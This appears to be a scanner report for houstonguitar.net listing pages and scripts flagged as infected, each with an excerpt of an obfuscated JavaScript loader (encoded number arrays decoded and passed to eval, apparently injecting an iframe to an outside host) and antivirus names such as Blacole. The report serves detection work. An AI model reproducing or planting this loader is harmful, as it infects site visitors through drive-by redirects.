Request | Server response | Status |
http://houstonguitar.net/ | 200 OK Content-Length: 53017 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,200,172,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,200,172,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,76,155,117,157,11
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|
http://houstonguitar.net/wpscripts/jspngfix.js | 200 OK Content-Length: 11844 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,170,157,170,163,160,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,170,157,170,163,160,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,7
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|
http://houstonguitar.net/business.html | 200 OK Content-Length: 43280 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,200,172,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,200,172,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,76,155,117,157,11
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|
http://houstonguitar.net/index.html | 200 OK Content-Length: 53017 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,200,172,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,200,172,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,76,155,117,157,11
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|
http://houstonguitar.net/services.html | 200 OK Content-Length: 19583 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,200,172,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,200,172,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,76,155,117,157,11
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|
http://houstonguitar.net/wpscripts/jsValidation.js | 200 OK Content-Length: 12643 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,170,157,170,163,160,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,170,157,170,163,160,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,7
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|
http://houstonguitar.net/aboutus.html | 200 OK Content-Length: 19363 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,200,172,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,200,172,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,76,155,117,157,11
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|
http://houstonguitar.net/useinfo.html | 200 OK Content-Length: 50370 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,200,172,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,200,172,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,76,155,117,157,11
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|
http://houstonguitar.net/contactus.html | 200 OK Content-Length: 13940 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,200,172,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,200,172,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,76,155,117,157,11
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|
http://houstonguitar.net/freestuff.html | 200 OK Content-Length: 17357 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,200,172,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,200,172,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,76,155,117,157,11
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|
http://houstonguitar.net/test404page.js | 404 Not Found Content-Length: 398 Content-Type: text/html | clean |
http://houstonguitar.net/lefthandcond.html | 200 OK Content-Length: 38746 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,200,172,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,200,172,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,76,155,117,157,11
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|
http://houstonguitar.net/findright.html | 200 OK Content-Length: 37789 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,200,172,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,200,172,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,76,155,117,157,11
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|
http://houstonguitar.net/elec_acou.html | 200 OK Content-Length: 37360 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,200,172,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,200,172,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,76,155,117,157,11
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|
http://houstonguitar.net/expens_cheap.html | 200 OK Content-Length: 36630 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,173,200,172,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,173,200,172,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,173,166,167,160,152,64,176,154,171,151,154,150,156,154,165,173,174,171,65,153,154,66,76,155,117,157,11
... 3003 bytes are skipped ...56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.37
- Avast
- JS:Decode-AXL [Trj]
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.JS.Agent.IF
- Comodo
- TrojWare.JS.Agent.LS
- Emsisoft
- JS:Trojan.JS.Agent.IF (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.ND
- MicroWorld-eScan
- JS:Trojan.JS.Agent.IF
- Fortinet
- JS/Redirector.BOZ!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Trojan.JS.Agent.IF
- Norman
- Blacole.VJ
- GData
- JS:Trojan.JS.Agent.IF
- BitDefender
- JS:Trojan.JS.Agent.IF
|